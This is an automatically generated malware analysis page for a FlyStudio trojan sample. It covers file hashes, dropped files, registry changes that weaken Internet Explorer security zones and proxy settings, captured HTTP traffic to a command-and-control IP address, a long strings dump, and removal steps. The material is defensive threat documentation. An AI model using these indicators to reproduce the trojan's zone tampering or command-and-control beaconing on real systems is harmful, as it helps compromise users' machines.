Trojan.Win32.FlyStudio_b14c438e54

by malwarelabrobot on June 24th, 2014 in Malware Descriptions.

HEUR:VirTool.Win32.Generic (Kaspersky), Gen:Variant.Kazy.366076 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b14c438e5457723d7f8cd445b3d69401
SHA1: 48da1d1b3a2281fb59aa745b7466dd1316e55929
SHA256: b6dde1e3f56b5eab25a35c41e395a955f46e2051f2b2994cd755a48c3ea5214e
SSDeep: 49152:I0GEd/4JQfz5prnQ54QozUZnRQtA4NRrfX8DRGc1yUJGRyZU1c/SjrRNmNC44s9e:IVoJftJi4anRQmYrfM4coUBZ5i l
Size: 3862528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Fusion Install
Created at: 2014-06-04 10:34:07
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:208

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)

Registry activity

The process %original file name%.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 6B C5 B4 5B 9D 0D 06 A1 75 0A AA DC D8 C2 28"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912 c:\WINDOWS\system32\SkinH_EL.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1076750 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 1081344 603664 0 0 d41d8cd98f00b204e9800998ecf8427e
.data 1687552 401322 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 2088960 383528 368640 1.56795 352a9695457ee0ad5ff21f6565a784ad
.vmp0 2473984 2517355 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp0 4993024 49204 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp1 5046272 3488220 3489792 5.49416 bd74e24f97f5e8629357ae467e146b06

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://221.123.147.73/111.asp?post=/33333.mdb2412511990317927241251123456789&2014304352632430223310325223122613267326
hxxp://221.123.147.73/piaoyh.aspx
hxxp://221.123.147.73/111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3..


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 221.123.147.73
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK; path=/
Cache-control: private
2....



POST /piaoyh.aspx HTTP/1.1

Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 12
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK

p=97E121E98E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 32
00280096003A009600E1002800EE003A....



POST /piaoyh.aspx HTTP/1.1

Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 191
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK

p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E51E51E51E50E58E58E50E49E50E50E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 339
54E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E1
24E51E51E51E50E58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E
50E69E67E64E55E126E94E120E119E100E126E48E51E67E75E58E67E52E52E59E65E68
E73E60E52E71E50E71E70E65E58E78E48E125E49E65E66E51E62E73E55E55E59E59E69
E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E64E118E56E
....


The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_208:

.text
`.rdata
@.data
.rsrc
@.vmp0
`.vmp0
`.vmp1
g.EM^V7Z
EweB
e%f'G
.OO??b
cS.NO
.fF~p
EV.OrE
X%fqwE
$ÿ'
òDC
.nO? 4
M.Osc
}m.Bb~??
.GFfz
k.bsSw
Wn.QRA
.EEh(
b:\yL
\m.RB
]DU.Nmn
Vm.BCP
3t5%f
.RQQA
e%F'G
>.NbC_
d%f'Kk
>..QQm
T.pO`x
MM.oO
t$(SSh
~%UVW
u$SShe
kernel32.dll
shlwapi.dll
user32.dll
ntdll.dll
ole32.dll
WinINet.dll
Wininet.dll
CreateWindowStationA
CloseWindowStation
ExitWindowsEx
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
GetAsyncKeyState
GetTcpTable
CreatePipe
MSXML2.XMLHTTP
Microsoft.XMLHTTP
MSXML2.ServerXMLHTTP
MSXML2.ServerXMLHTTP.6.0
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
application/x-www-form-urlencoded
Freestyle.exe
config.ini
1000000001
http://221.123.147.73/zhuzhou.txt
drivers\etc\hosts.asp
&SQL=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
http://
1.ini
2.ini
3.ini
4.ini
.Aqwertyuiopasdfghjklzxcvbnm
c:\11.bmp
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
%System%\SkinH_EL.dll
%u y2
0.du./
.K.cW
}.Dkn
OkC.xL
%System%\esdpf.she
1990317927
@kernel32.dll
90*('$$-
1-TOUCH PASS
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
http://dywt.com.cn
service@dywt.com.cn
 86(0411)88995834
 86(0411)88995831
Windows
(ESPINN.dll(NN
This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit www.dywt.com.cn/info
CallerInfoCopyCmd
SetIPPort
GetIPPort
"C:\Windows\System32\ESPI11.dll"
ProviderInstallCopyCmd
SockDataCopyCmd
SockAddrCopyCmd
enetintercept_fnSockAddrSetIPPort
enetintercept_fnSockAddrGetIPPort
enetintercept_fnInstallCopyCmd
enetintercept_fnSockDataCopyCmd
enetintercept_fnSockAddrCopyCmd
enetintercept_fnCallerInfoCopyCmd
%s\ESPI%d.dll
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
www.dywt.com.cn
X-X-X-X-X-X
%ld
0000%d
EMSG
Recv Sub Packet(%s)..
Recv Packet (%s)...
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
%d%d%d
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
 (&''&(,
*%).--.)%$
#include "l.chs\afxres.rc" // Standard components
>6n.Rr:,
WEBh
D$%%f&G
Vm.BB
|f.oz
n.nn/
5vBN.rR,
5%FWq
],.yx
.fJ&7
.GhX3
H,.sS
-DEYZ}
H
>.Nb!V
;
5-%%FjZ
 l%fG
J.fWvVg
_, 792:"
$EE%f
:#Sz%u
n.Rr:$
l%uJ8
%fz[&
7Ww%f
%f:El3
.Rr: EP
.RB%eU
=-.Bb
.OscF6Vj^j
,LM.OP
J*.nB
.OscF&
.N.op
.RJK;
hI%ul
yf.oz
t!:%su
ÿ6w
Kn.BQ
6.Or:
-Aa}=
6.EEh
:$X-0}|
%0xpu
*b.ar3
CD%%F
)>.Oc
 #-mx}
W:\Jn
.Nr:%
.oz(~
N:%xI
Q:%ss
|\:%u;
{m:%f
4X:%dW
%Xym:%X 
v!:%S
:%CX7
.RJBCC$e
cS.gH
%FjZ54
z%f::5\
-.RQP
w%Fj::
6:|s.vr
t5%fz
DU.nE
n.RQQA
.PXjk-z[
SQL F
%fwe%
.FfVw5
M.RB%>
eE%f'
~V.Nrb
.RR:8|p
.FFZE
.Os4:&
D$ B!.Wh
,=>("{[->
~|/f.yx~;
.Rr:>
-.RSw
ôt:>
ymEÿ
N.Rs:>
.pweo
.ol0c
ev.NLL
l-M.Nr3:?z
:?e%fw
..op0
.Osc>V
6.NqE
N%fwE
D$$%u
bX*%u
m.NOs
%.RcDh
 e.fF
!n.RB
%~
.WE}]-G
D<45ò
-i1l}
llzCJ%U
-=N.RB
.fGk O:2
*N.RB
v.OEO<
3.um.
^,0<83:2
[]M.By^
?:3E.WhH
.LCT-
%Fj:3(
m.nNn
.Rr:0
mK.CQe
D$$1%x4
%Fj :0R
.inzE
5%fz;W8
b"Cc$%f&
 n)|.CU
e\.YvRc
#D%%F
.N.nO
rM.nn
w%F:6.
.Pa!EDD4
KV.Xi
m..nOp
~n*%uNg
.EEYYm
.RB%>
 :.Ne
%Fj:6
.FfV12
m.Nrb
}m.Bv
_,6<92:4
$.Oc9
#c$%F
Zn.BQ
n.RS:2
ÿ##G7
E5.ws
&J:.ff~
.NbBV
=N.Rk
?cS6.nOsc
D$ (%9U
cDd%f
.OP0T
D$<7%s4
x%fYj
.Nq2FM
mn.vaV
7.gVg:
d%FG'
.QRvf
.KPay
*%u-,D
.Egio
uU.fe
N.RB6n.
} m.Os
n.yasw/@
-.Rr:
"cd%F&
.Nrjk[
K$..BV
.Ok &
Jn.RB
.Nj*N\
^*.af
H E%8x@i
,\m.RB
*=$H
%FjZ5
D$,%c;2
.Vgff
D$<1%x4
V.-e}5
L|.yh 1q
"3t|.yP
V.Vhm
l-.RB
.oOs4
.Jkiz
?.hizS
%F'gg
D$$%s
.nh7F
öWk
.Ey%FN
.LePa
.Nrb=VwO
)Jm.RB
.ajBS
%XltIl
.mAdx#
!,;2%Dkr
.AXO>]lyOd
%FH7f
2u!63%f
5J@Ü
#d.NHF
&.Vx}
jJ%8x
WINMM.dll
WS2_32.dll
GetWindowsDirectoryA
WINSPOOL.DRV
UnregisterHotKey
RegEnumKeyA
ShellExecuteA
)~.cQ
d3%6x
]Qo@%x
È~qJ
.Rv}#
&/%x0p
J.rhd
*.VP=
LF.LF
CreateDialogIndirectParamA
SetViewportOrgEx
@.vl]
^6a.yUZ
?X.bry
.qL@.^H
.ntPrN
`-21$%DH
 .GK`,/
' .,5?9@'
wgio.kj
(.KI*\
'.nU'6
$^0(4635
-in}I
_^.go
KRQU.Xb
.-(263?@
% -46?>@
7bn.pu
\v\.ad
e !%F
%uLqs~X
%gm.ku
8L.Xh_e
?=E.OV
[%c{H
FJOQ.UV
WeBn
fk-hmpx}
hudp
~"$!-(1<
$p.to
HO.NR
jh.ry
.KYHq
WAw]%XX] 
'"/8-.*, 
?WZ.Xa
%X$)13
%F"@:
$-164138
Y].cf
`l.mw
]`eik.om
e(#&.OJ
#(0352>:
MKS.VQ
".ODA
DKR[f.no
GAC.IM
1;GCE.NIhHK
OEXe
~72K.dH@
68=;V<.GK(NV]^Z
zY.hL
.AqVm
POo>.hJ
.pl/)T
;D.jy!
oi4.YS
Wl.MYH
"=N.CHC
=T%Xz3
E.tO{I
PZfoO.aN
.jueI
O0.Ya
.Nk/}
2.NrO
1.ZT[
QA.tB
.my.(
J[.TO
KR.kQ
.WWQeJ
.DHtS
%UGNV
/(X.bl
.XEU^
%x9}o
H%sia
.miQ,
%d`;L'iCN
q.xCg
B:\8o@
.gr=6Z
WININET.dll
RegDeleteKeyA
ADVAPI32.dll
InternetCrackUrlA
OLEAUT32.dll
SetWindowsHookExA
RegisterHotKey
GetViewportExtEx
RegOpenKeyA
6u!'$%f
RASAPI32.dll
.CxeYi
The procedure entry point %c could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
GetProcessHeap
InternetCanonicalizeUrlA
OffsetViewportOrgEx
WinExec
@0@@@8@ @
=.lh4.
S%XQ([H
DI.UQ
# ,) 126
X".CO
xD.COX
W.hp@
^`.mk
9.AE`DHQW
WG.alq
/'%SzW
%&#/.(51
70>;:@/,
e.oh/u
/I.OO
%.ORs
.mdxp
Y%u(p
b615?GM.PY
Jp$.OLD
b%sMn
"!@'#,19
3S.OG
.KT`_fcd
:v=D.OJ
a.zx(
%Dx*R 
\.xR@
.ns)zx
7ce.nw
0%FIPF
.;.ibi
.OzHo=1
n'.KR
%xRWU]
8?>7D.IW
v16.JX
HVZ.XY
*-0,(53?]
"*/4368.GJf
ib.mT
4M.YH
4Y`en.oi7
.!)`5<8:
.gl#(
bKeY
 01?F@I.OT
(.HSO
$&!  517
{@'(3251?&
Ê1(*
f.EK0
!,. 3(2;8'"
Î@I
ef.kn)q{5
t-.WD
.DC_)@q
$!-.43<)
.XHm_
u_bnw.rz
.)689?;>
' .(6740
Bk.wv
.pyP}
9
Y`.mt
[%/-08=?
!o.XJA|,
[y%.Pas
` ðA
%Fj>j
T^\_[X.dnF
3.ePf
$! '#,0:
!*/)6.5<
MU]fa.gl
ZY.KJ
XZ(.TL
H:.woz`
UWP]aio.np
V8.EC
& #(1159
.6?<.GI8KLJQR
#/0)4265
.GDe(d
~B.Fg
`.joxpsqr
Q.upeK
-Xd},
,4>8EAL.MV
 .HqK
5'".ME
" !-)72?
.ovxnr~
gV`.jp
p5T24V=.DCJM
n/.ON
*.,/521=
j(/)0=.FD@HMITUq5
"j%FP
!  -1427<
t%Do}4
;.EMV
.b.OU
BDL.VSIXc
| "/, 536=>:
$".745>6
?9CK.WZ
mlknj.vw
Ygb.nw
.jWZ4
%fjb1
.LS[Z _bed
1!#*5:3<
%xC1i<
.rut_y
}].bn
fK.SW
T^.dm
.tYy}
709@.CO
\^Bo?
$!#,(*07>
v}.xz/
-4xy}
it.QK
]#%FH
gf`ko.jw
\elji.vy
QSWUZfl.it
)61732;<
n.VQ \fnlio)
}%c{H
u.dGLXT
l36>:FI.WPPRUvy
.CNAg
0.sr(
Zb.ls8yz
sT.Zf
gcU%S2'
`.y%x
.ks@}{z
ssh!:
FEKV.ST
) -.03:;0
%xQAT
p).GB
{UPRFi.mk
# ,$.OH
MO.JN7
%xFMn
c%Xx[
X%upD
2801547
.DJ',
!( .zO
_t5\Q.Wc
%x")46
e"%FJ
!O%sn
#'%D-,0
%$0&.)/(
{'#%Dn
#&,835>;@
XX%5Xi0
b%.OU3
JLRU.Ze
".IS$v
`%up'
V\.Yg
B&%XP
ZacVo.puJr
j>E.IV
& %/ 14=
(".cN
$ ' %, 6
'.IOPu
" %(0?@.JI
,.(653;>
JSX]f.geXadko
.qz[d
D,R%c
.GN /6
 .OS9
^.af@glvrp
RYec.dj
@DM.KQq\[
! @6;9=8
%uvw~
', -758:
.) 2621`^@
z(.yx
[_bad.lj
DIM.WUh_x~
\Xbn.qsJt3
Q=A.DO
.[g`.dc1o
#"(41 5:89<;
=D.EB
.nx9;8
RVZed.giYr~-
. %8,-/.*
HJLK.RW@S\flm
9# y.YD
W.dJ;
%#'&-7?.9;
&#*.aX
FCJLU.PQ
i.(.IK
,`.Ka
!0 -) .(
TXgcli.ohPupz
]`ackop.wy
8.ZP.xe
~y%xE)
_ "-/751
;%u4DH
.jqt'
@.EOUS
EAF.LT
crp.uy
GJ.IN
TZc.di
(W.jR_'
cE&
a.hl9qu
!9=AI.SZ]
& /.zO(
.DQ(A*
% .GJlP}
|]%x`
il.kv
-c.kd
|FK.cq
N1%f!
$-.)0;=:
/, 709=;
.RY{zc
\a.eiSv&$e
Q]f.gc
3O.kG
i".GA
* /7<98`
.HJhV
d.muhqy
(598;?8'
eo.rt
.emhoknr
lO%cJ
 /$312;@
%sKCP
%s/u?~)
em.qubzOf
.yM@bo
NLM.VY8akmlq
RPSYd.ei8s{}
$d$.OI@
'.RSo
!./53<>_
3=?D.BI
jF.Ic
R@.rl
'! )/.21
QX[d.lj(pr
:@FHVQSQL
DBEIS^c.bj3o?
;A.BK
ec.ljVnD
3.SO^
-*.OV
/6e%x
IR_.Yc
sv.wq
,-14>?=5
T\ef.jh
o$)70;.BJ
_.abPmrqpp_y
urlx{
|G.fa
.XK(v
as7%U=
VP^.YaXgn
`cjo.kh
<",)/*7|
6Yp%U
{B.AG
LQ^ab.nh
# ")7065
 -71500.
R .ghIor='
sk.tp8wy
o.IGMgF<
h.Nf O
.Bx$ 
! )0.*179
&,7?D.AB
DBusSql
SVZgckj.hvh
@.HPW
& #"(58:`
$#/:*,25
%Xi&_l
%fPNk
?=:GOQT.ZX
_%x!6
ýS?
SXcakr.wq
YX\.ag
$.OWd
!'#$/. )63?9;
.jF,1
$,.15<@)3
M.SR#_
\'%-.59;
[!.SN
RegOpenKeyExA
comdlg32.dll
iphlpapi.dll
SetViewportExtEx
GetViewportOrgEx
KERNEL32.dll
.ILWj}
SHELL32.dll
ScaleViewportExtEx
UnhookWindowsHookEx
GetCPInfo
GetKeyState
-N}MD
RegCreateKeyExA
.IHC6a
RegCloseKey
1, 0, 6, 6
(*.*)

%original file name%.exe_208_rwx_009BC000_00002000:

WININET.dll
RegDeleteKeyA
ADVAPI32.dll
InternetCrackUrlA
OLEAUT32.dll
SetWindowsHookExA
RegisterHotKey
GetViewportExtEx
RegOpenKeyA
6u!'$%f
RASAPI32.dll

%original file name%.exe_208_rwx_009BF000_00001000:

The procedure entry point %c could not be located in the dynamic link library %s
USER32.dll
The ordinal %u could not be located in the dynamic link library %s
GetProcessHeap
InternetCanonicalizeUrlA
OffsetViewportOrgEx


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %System%\SkinH_EL.dll (88 bytes)
    %System%\esdpf.she (20 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now